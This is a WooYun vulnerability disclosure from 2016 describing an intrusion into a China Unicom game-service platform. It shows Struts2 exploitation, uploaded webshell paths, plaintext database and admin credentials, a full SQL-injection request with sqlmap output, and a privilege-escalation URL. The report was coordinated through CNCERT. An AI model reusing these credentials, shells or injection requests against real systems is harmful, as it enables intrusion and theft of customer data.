当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169998

漏洞标题:中国联通某游戏业务平台漏洞打包(命令执行/泄露大量订单信息/可替换app文件等)

相关厂商:中国联通

漏洞作者: JulyTornado

提交时间:2016-01-15 02:30

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-15: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-29: 细节向核心白帽子及相关领域专家公开
2016-02-08: 细节向普通白帽子公开
2016-02-18: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

一只哈巴狗
坐在家门口
眼睛黑黝黝
想吃肉骨头
一只哈巴狗
吃完肉骨头
尾巴摇一摇
向我点点头

详细说明:

**.**.**.**/spms/Login!input.action
湖南联通云游平台存在多个漏洞

clipboard.png


0x01、多个Struts2漏洞:

clipboard.png


上菜刀:
**.**.**.**/spms/daozi.jsp

clipboard.png


上大马:
**.**.**.**/spms/pages/test/jspspy.jsp

clipboard.png


0x02、数据库弱口令:
数据库连接配置文件:

/home/deploy/apache-tomcat-6.0.43-manage/webapps/spms/WEB-INF/classes/database.properties
####################################
# Database Connectivity Properties
####################################
driver=oracle.jdbc.driver.OracleDriver
#url=jdbc:oracle:thin:@**.**.**.**:1521:orcl
#url=jdbc:oracle:thin:@**.**.**.**:1521:dev
#url=jdbc:oracle:thin:@**.**.**.**:1521:bjzdgb1
#url=jdbc:oracle:thin:@**.**.**.**:1521:orcl
# gansu local test
#url=jdbc:oracle:thin:@**.**.**.**:1521:sonata
#username=vass
#password=vass
# henan local test
#url=jdbc:oracle:thin:@**.**.**.**:1521:orcl
url=jdbc:oracle:thin:@**.**.**.**:1521:hnuncdb
username=vass
password=vass
#username=dss4
#password=dss4
initialPoolSize=3
acquireIncrement=3
minPoolSize=1
maxPoolSize=2
maxIdleTime=120
encryptType=0
#driver=com.mysql.jdbc.Driver
#url=jdbc:mysql://localhost:3306/test?useUnicode=false&characterEncoding=UTF-8
#username=root
#password=root


数据库用户名密码均为vass

clipboard.png


clipboard.png


0x03、用户密码明文保存,且存在大量弱口令:

clipboard.png


使用admin/bonc2015登录,可泄露大量订单信息,共19720条记录,其中包含订购用户手机号:

clipboard.png


可替换游戏app为木马病毒:

clipboard.png


0x04、SQL注入:
包括但不限于订购明细查询功能,存在SQL注入:

clipboard.png


userTele等参数存在SQL注入:

POST /spms/vass/webPatner/WebPatnerCommon!commissionDetailResult.action HTTP/1.1
Host: **.**.**.**
Content-Length: 83
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.1
Origin: **.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 CoolNovo/**.**.**.**
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: **.**.**.**/spms/vass/webPatner/WebPatnerCommon!commissionDetail.action?__moduleId=69596
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=F3B5DDAD7044023B990E36A131BE9F28; reportUserId=admin
dateType=01&acctDay=2016-01-14&acctMon=2016-01&agentName=&saleSta=-1&userTele=13*&_=


clipboard.png


available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] VAAS
[*] VASS
[*] WMSYS
[*] XDB
[*] YYPUSH


0x05、垂直越权:
使用低权限的bjfyhy/1q2w3e4r5t登录:

clipboard.png


访问只有管理员能够访问的URL,可查看所有用户信息:
**.**.**.**/spms/xframe/security/UserExtend.action?__moduleId=007.001

clipboard.png

漏洞证明:

不深入了

修复方案:

你们比我懂。。。

版权声明:转载请注明来源 JulyTornado@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-01-19 11:48

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给湖南分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-15 03:37 | 红客十年 ( 普通白帽子 | Rank:376 漏洞数:18 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    两只哈巴狗坐在家门口眼睛黑黝黝想吃肉骨头两只哈巴狗吃完肉骨头尾巴摇一摇向我点点头